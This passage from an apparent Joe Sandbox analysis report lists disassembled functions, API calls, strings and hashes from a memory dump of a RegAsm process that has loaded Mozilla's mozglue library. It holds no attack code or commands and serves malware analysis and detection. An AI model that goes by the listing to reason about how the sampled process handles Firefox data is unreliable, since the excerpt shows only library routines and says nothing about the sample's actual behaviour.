                                                        • Instruction Fuzzy Hash: E5717AB1A007069FCB14CFA8C480AAAB7F4FF08308B54463EE55A9BB41E731F655CB81
                                                        Function 6C119D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C118273), ref: 6C119D65
                                                        • free.MOZGLUE(6C118273,?), ref: 6C119D7C
                                                        • free.MOZGLUE(?,?), ref: 6C119D92
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C119E0F
                                                        • free.MOZGLUE(6C11946B,?,?), ref: 6C119E24
                                                        • free.MOZGLUE(?,?,?), ref: 6C119E3A
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C119EC8
                                                        • free.MOZGLUE(6C11946B,?,?,?), ref: 6C119EDF
                                                        • free.MOZGLUE(?,?,?,?), ref: 6C119EF5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                        • String ID:
                                                        • API String ID: 956590011-0
                                                        • Opcode ID: 8abf0dbe87e6c033e12039febb457a01c75cd872db69c9118b45de35a095e472
                                                        • Instruction ID: b9a39c46868196a40902215cdeb1979cbf1f106861a96dd1ede54efcb2d7d4be
                                                        • Opcode Fuzzy Hash: 8abf0dbe87e6c033e12039febb457a01c75cd872db69c9118b45de35a095e472
                                                        • Instruction Fuzzy Hash: 39719E7490AB418FD716CF18C49065BF3F4FF99315B448A69E85A9BB01EB34F885CB81
                                                        Function 6C11DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C11DDCF
                                                          • Part of subcall function 6C0FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0FFA4B
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DE0D
                                                        • free.MOZGLUE(00000000), ref: 6C11DE41
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DE5F
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DEA3
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DEE9
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C10DEFD,?,6C0D4A68), ref: 6C11DF32
                                                          • Part of subcall function 6C11DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DB86
                                                          • Part of subcall function 6C11DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DC0E
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C10DEFD,?,6C0D4A68), ref: 6C11DF65
                                                        • free.MOZGLUE(?), ref: 6C11DF80
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                        • String ID:
                                                        • API String ID: 112305417-0
                                                        • Opcode ID: 39a708c98242ac0c4d2bc6e1a7edd80eba5d53541a4cdf91f8ec6a7b78032563
                                                        • Instruction ID: a4a27a4c7d277a4bf8ccd5aa8fcdaf037783c1073c552e2ec37b97cdf6a587e6
                                                        • Opcode Fuzzy Hash: 39a708c98242ac0c4d2bc6e1a7edd80eba5d53541a4cdf91f8ec6a7b78032563
                                                        • Instruction Fuzzy Hash: 1351FE7660A6119FD712AB18C8803AE73B2BFA5309F56053CD51653F00D739F91ACB82
                                                        Function 6C125D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D32
                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D62
                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D6D
                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D84
                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125DA4
                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125DC9
                                                        • std::_Facet_Register.LIBCPMT ref: 6C125DDB
                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125E00
                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125E45
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                        • String ID:
                                                        • API String ID: 2325513730-0
                                                        • Opcode ID: 7631316ed9de4b4fc29765daeffef5986dc70dd489ff6cd140d4567289b57cc4
                                                        • Instruction ID: d4ceccb469e08bfbdd11d3d89a2db521735212b6c85cc51b853203ad6b7db7b0
                                                        • Opcode Fuzzy Hash: 7631316ed9de4b4fc29765daeffef5986dc70dd489ff6cd140d4567289b57cc4
                                                        • Instruction Fuzzy Hash: 444192747002089FCB00EFA5C8D8AAEB7B5EF89358F444068D50A9B781EB38EC45DF51
                                                        Function 6C0FCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0C31A7), ref: 6C0FCDDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                        • API String ID: 4275171209-2186867486
                                                        • Opcode ID: 568f1384b8658bcccef48efe3d04da13b83c320a4d0a7209998d99f8e56d1140
                                                        • Instruction ID: 45f8a33a49244b668a84c085e3faa818f53668978032552990adb197d3affd70
                                                        • Opcode Fuzzy Hash: 568f1384b8658bcccef48efe3d04da13b83c320a4d0a7209998d99f8e56d1140
                                                        • Instruction Fuzzy Hash: 5231A5317412155BFF24AF658C46BAEBBF5AF81718F308018FA25ABAC0DB70D5458BA1
                                                        Function 6C0CBAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0CBC03
                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CBD06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                        • String ID: 0$0$y
                                                        • API String ID: 2811501404-3020536412
                                                        • Opcode ID: 400dbba25539b017b9c20458a9edfe51bbda5fc4427db55cb28ffb598ae8eb0c
                                                        • Instruction ID: f7d9914948d43335f860009f00260e22205bfdd5e043c316c40e35fc2d8db84f
                                                        • Opcode Fuzzy Hash: 400dbba25539b017b9c20458a9edfe51bbda5fc4427db55cb28ffb598ae8eb0c
                                                        • Instruction Fuzzy Hash: E361B171B087458FC710CF28C481B5FB7E5AF99348F004A2DE889A7651EB71E9498B93
                                                        Function 6C0CECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0CF100: LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
                                                          • Part of subcall function 6C0CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132
                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C0CED50
                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0CEDAC
                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C0CEDCC
                                                        • CreateFileW.KERNEL32 ref: 6C0CEE08
                                                        • free.MOZGLUE(00000000), ref: 6C0CEE27
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C0CEE32
                                                          • Part of subcall function 6C0CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C0CEBB5
                                                          • Part of subcall function 6C0CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C0FD7F3), ref: 6C0CEBC3
                                                          • Part of subcall function 6C0CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C0FD7F3), ref: 6C0CEBD6
                                                        Strings
                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C0CEDC1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                        • API String ID: 1980384892-344433685
                                                        • Opcode ID: a6b5dba72b36f75917e354571a51cff69a60bdb9527d894cda6c814805257327
                                                        • Instruction ID: 6e3ef64cba0f2a60c9b592b5309f3ee40dbfc31002be0ebdca710839773ec4fa
                                                        • Opcode Fuzzy Hash: a6b5dba72b36f75917e354571a51cff69a60bdb9527d894cda6c814805257327
                                                        • Instruction Fuzzy Hash: 02519E71E052148BDB10EF68C8427AEB7F1AF5935CF44852DE8656B780E730A988C7A3
                                                        Function 6C0D0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(0000000C,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0A72
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • moz_xmalloc.MOZGLUE(?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0AF5
                                                        • free.MOZGLUE(00000000,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0B9F
                                                        • free.MOZGLUE(?,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0BDB
                                                        • free.MOZGLUE(00000000,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0BED
                                                        • mozalloc_abort.MOZGLUE(alloc overflow,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                        • String ID: alloc overflow
                                                        • API String ID: 1471638834-749304246
                                                        • Opcode ID: 026d639db108f7be8a2b0bab67fd5b845dbb273276d003be0f6772fe22eccf69
                                                        • Instruction ID: 7a755dc1e8651310c34de533bb147670eff377f971d1442c4a5910f90ca4c664
                                                        • Opcode Fuzzy Hash: 026d639db108f7be8a2b0bab67fd5b845dbb273276d003be0f6772fe22eccf69
                                                        • Instruction Fuzzy Hash: 77519DB4A083468FDB14CF18D880B6EB3F5EF4830CF56496EC85A9BA01EB71B544CB51
                                                        Function 6C13A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C13A565
                                                          • Part of subcall function 6C13A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C13A4BE
                                                          • Part of subcall function 6C13A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C13A4D6
                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C13A65B
                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C13A6B6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                        • String ID: 0$z
                                                        • API String ID: 310210123-2584888582
                                                        • Opcode ID: e76e90bc48b3321f1ed9a4730288cc6edbf6f883e900e33779ccba17a6fd49b0
                                                        • Instruction ID: 58978984a5253fb360e090f6b6cb19bfcf4cdd748123fd399b107a4a11923448
                                                        • Opcode Fuzzy Hash: e76e90bc48b3321f1ed9a4730288cc6edbf6f883e900e33779ccba17a6fd49b0
                                                        • Instruction Fuzzy Hash: D34138B1A097459FC741DF68C080A9FBBF4BF89358F409A2EF49987650E730E549CB92
                                                        Function 6C0C78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.MOZGLUE(?,6C14008B), ref: 6C0C7B89
                                                        • free.MOZGLUE(?,6C14008B), ref: 6C0C7BAC
                                                          • Part of subcall function 6C0C78C0: free.MOZGLUE(?,6C14008B), ref: 6C0C7BCF
                                                        • free.MOZGLUE(?,6C14008B), ref: 6C0C7BF2
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CriticalSection$EnterLeavememset
                                                        • String ID:
                                                        • API String ID: 3977402767-0
                                                        • Opcode ID: 4fa535613560ff5f79ca5d54c09e4038f6441155e1ddc2d111320562ee61df53
                                                        • Instruction ID: 6303872fcafe36275c6b5d5105c58a20c5f5624ac4a7d07359679d9d373ad57a
                                                        • Opcode Fuzzy Hash: 4fa535613560ff5f79ca5d54c09e4038f6441155e1ddc2d111320562ee61df53
                                                        • Instruction Fuzzy Hash: 7FC19331F011288BEB248B2CDC90B9DB7F2AF45318F1546E9D51AA7BC1D731AE858F52
                                                        Function 6C109420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                        • __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        Strings
                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C109459
                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C10946B
                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C10947D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                        • API String ID: 4042361484-1628757462
                                                        • Opcode ID: 8d912ee5d070b291494cacd2dc801cc84a23bd3f12e6baa7421c5b9dc119b1c3
                                                        • Instruction ID: 131f825945b2e8d04817fffaa29d3cd136fd07c4b6b28654dae1d7a647e8f89d
                                                        • Opcode Fuzzy Hash: 8d912ee5d070b291494cacd2dc801cc84a23bd3f12e6baa7421c5b9dc119b1c3
                                                        • Instruction Fuzzy Hash: 48019C38B0010087D700AB5CD934A4633B49B0137EF19C537EC16C3B41EE35E4658957
                                                        Function 6C111220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11124B
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C111268
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1112DA
                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C11134A
                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C11138A
                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C111431
                                                          • Part of subcall function 6C108AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5
                                                        • free.MOZGLUE(?), ref: 6C11145A
                                                        • free.MOZGLUE(?), ref: 6C11146C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                        • String ID:
                                                        • API String ID: 2803333873-0
                                                        • Opcode ID: 7669e6661c9d3450ded5e768fbd9d24ff2bb487215a7939ae8858594cb9269bf
                                                        • Instruction ID: cad434f6382fa40bcdd3553f74c630c1be4686d2b9779bf5846c06bf61a243a8
                                                        • Opcode Fuzzy Hash: 7669e6661c9d3450ded5e768fbd9d24ff2bb487215a7939ae8858594cb9269bf
                                                        • Instruction Fuzzy Hash: 3A61E275A083409FDB10DF25C880BAAB7F5BFD5318F14892DE89957B11EB34E499CB42
                                                        Function 6C110F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C110F6B
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C110F88
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C110FF7
                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C111067
                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C1110A7
                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C11114B
                                                          • Part of subcall function 6C108AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5
                                                        • free.MOZGLUE(?), ref: 6C111174
                                                        • free.MOZGLUE(?), ref: 6C111186
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
